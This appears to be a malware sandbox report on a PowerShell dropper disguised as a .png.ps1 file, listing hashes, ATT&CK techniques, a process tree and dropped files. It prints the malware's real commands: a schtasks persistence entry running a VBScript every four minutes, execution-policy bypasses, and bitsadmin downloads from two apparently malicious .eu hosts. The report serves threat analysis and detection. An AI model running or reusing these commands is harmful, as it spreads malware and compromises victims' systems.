27be11fa92a078991c195850e10e1acfac1bd78f860cb803fffe7c9622227983

General

Target

YQpjoXnBJr/WRQDouwL.png.ps1
Size

304KB
MD5

803d84838415f3c36742821f70203a8f
SHA1

e3b4bc28676f9f1c2c71fff706d240e9557df75e
SHA256

e20d63d82415c54f408d750f77b1442b4540e1e7eca70cc5e77fc06a093a1eec
SHA512

e083ed91c0eb5316d12ba090f2c14ed8a01075ebbb25a47f1f30ef56bf9877556aebb9e12ea0d39ef7ff5fcfd98e43c6c4fdb828936264e5abe75f2620277000
SSDEEP

1536:xoXGg/lCHSnPiCqoUZRCHJt50IRNGTRwOs3iFXO57fEPmjwl3Fo5+w5vKBx9SG0W:fmmp

Score

10^/10

dropper execution

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

bitsadmin.exebitsadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2916	5116	bitsadmin.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3048	5116	bitsadmin.exe	87

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exebitsadmin.exe

pid	Process
2916	bitsadmin.exe
3048	bitsadmin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.EXE

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	wscript.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
3092	powershell.exe
4312	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
3108	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
3092	powershell.exe
3092	powershell.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3092	powershell.exe
Token: SeDebugPrivilege	4312	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

powershell.exewscript.EXEpowershell.exe

description	pid	Process	procid_target
PID 3092 wrote to memory of 4572	3092	powershell.exe	84
PID 3092 wrote to memory of 4572	3092	powershell.exe	84
PID 3092 wrote to memory of 3108	3092	powershell.exe	85
PID 3092 wrote to memory of 3108	3092	powershell.exe	85
PID 2140 wrote to memory of 4312	2140	wscript.EXE	104
PID 2140 wrote to memory of 4312	2140	wscript.EXE	104
PID 4312 wrote to memory of 1528	4312	powershell.exe	108
PID 4312 wrote to memory of 1528	4312	powershell.exe	108
PID 4312 wrote to memory of 3552	4312	powershell.exe	111
PID 4312 wrote to memory of 3552	4312	powershell.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\YQpjoXnBJr\WRQDouwL.png.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3092
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
  2⤵
  PID:4572
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /F /create /sc minute /mo 4 /TN "S0xiGXlCwrI" /ST 07:00 /TR "wscript /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\xiGXlCwrI\lqOYUHiD.rock"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3108

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\xiGXlCwrI\lqOYUHiD.rock
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file lqOYUHiD.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\system32\getmac.exe
    "C:\Windows\system32\getmac.exe" /fo table
    3⤵
    PID:1528
- - C:\Windows\system32\bitsadmin.exe
    "C:\Windows\system32\bitsadmin.exe" /reset
    3⤵
    PID:3552

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer AngSyW /priority FOREGROUND "https://yjtyhm.eu/topic//ab515c4b674aa7cd8c862269bc0a7d7c.html" C:\users\Admin\AppData\Roaming\xiGXlCwrI\0_svchost.log
1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:2916

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer AHacpJ /priority FOREGROUND "https://nmhholiut.eu/topic//ab515c4b674aa7cd8c862269bc0a7d7c.html" C:\users\Admin\AppData\Roaming\xiGXlCwrI\1_svchost.log
1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:3048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

BITS Jobs

1

T1197

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8a507ea87f4db23962b175b90889f86

SHA1
d7957c02ed987bbf866c98e4491a926b5453c58d

SHA256
291a53a8822be2c1b654a400ccd6fbbbf90712d4eb2078ccd2d10824d4de4e2b

SHA512
23c6774e1c2bb07e9eb814b60b040ebaea933bc664b9eebfa741495e89a8568ff86653b4efa58595fa94f7aff0216d132db96a871ca78600fea3e5c08b9d2bea

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zu1pei1r.jn2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\users\Admin\AppData\Roaming\xiGXlCwrI\lqOYUHiD.ps1

Filesize
2KB

MD5
59161dfe806fae8eb2e2244bc0e5344f

SHA1
d442e547bd477651ea7784bdab988e6eaa5e4f5a

SHA256
55d4414c70d53da41ec1694a86f57b522328364945a8ac7a1e640a9501acfa2b

SHA512
6a250fe12de28ed6486459a59436d9405c35044da5be1a59fa34870e25c401e8f8c81f5ccf17cbf892532f497d414bc6220b2a916948f99f06671214b0c90990

Download Submit
C:\users\Admin\AppData\Roaming\xiGXlCwrI\main.sh

Filesize
196KB

MD5
d4f06b258da41c8260fe07e2bc280953

SHA1
046a98fa4b8e4b44914884c1525c2c787c98cfa4

SHA256
b89c2c4c38917239929a94d79f86076f61dde3029fb514fdc7944d7b0114a455

SHA512
3bc6231d0d5aebad5f3dc45ff6c9b9391ebab51ea004acadd4b9cea96fab91a2274a04d65ca76c431048303cb2405178fcfb989db7bbac95a10ccbf42c4ce660

Download Submit
C:\users\Admin\AppData\Roaming\xiGXlCwrI\sleep.sh

Filesize
1KB

MD5
a42520d036314591d61ecb810833a0f4

SHA1
f45f63c60562aadd137fe5f23d37ec5d8a1c54da

SHA256
f2d2cc6bb0b77ef031d0508acb99b4c12b95ff3eff76d33aeb40b8c8695146ea

SHA512
35a13ed9c17b1659f9c53ce4f53048f3dcf6e790a1b74bdcf174d3a625ad9db2e04da491f74d735bfabec54c2c7981c73ac516fe5612995836c179f792e73a9b

Download Submit
\??\c:\users\Admin\AppData\Roaming\xiGXlCwrI\lqOYUHiD.rock

Filesize
930B

MD5
b6bd012cb34ed4136998a856635e2b20

SHA1
1fe28b680b9bafc969cf39574c1df55a8c5f76a2

SHA256
7650dea686e4e2205704530b4196bd9ab738681c5b0c998f8f1f0fcaef859bcd

SHA512
3e5f72c3a8b59605e84b9034e9f8eb08f19928a8ef2d66da615b271775cd73d44403701383118d6055ccaf3217dbf6e6f6daeacdd41cf72d1f3b55a8e1de2586

Download Submit
memory/3092-11-0x00007FFC50C40000-0x00007FFC51701000-memory.dmp

Filesize
10.8MB

Download
memory/3092-21-0x00007FFC50C40000-0x00007FFC51701000-memory.dmp

Filesize
10.8MB

Download
memory/3092-18-0x00007FFC50C40000-0x00007FFC51701000-memory.dmp

Filesize
10.8MB

Download
memory/3092-13-0x00007FFC50C40000-0x00007FFC51701000-memory.dmp

Filesize
10.8MB

Download
memory/3092-12-0x00007FFC50C40000-0x00007FFC51701000-memory.dmp

Filesize
10.8MB

Download
memory/3092-0-0x00007FFC50C43000-0x00007FFC50C45000-memory.dmp

Filesize
8KB

Download
memory/3092-1-0x00000186775D0000-0x00000186775F2000-memory.dmp

Filesize
136KB

Download
memory/4312-36-0x000001CDA9240000-0x000001CDA9768000-memory.dmp

Filesize
5.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads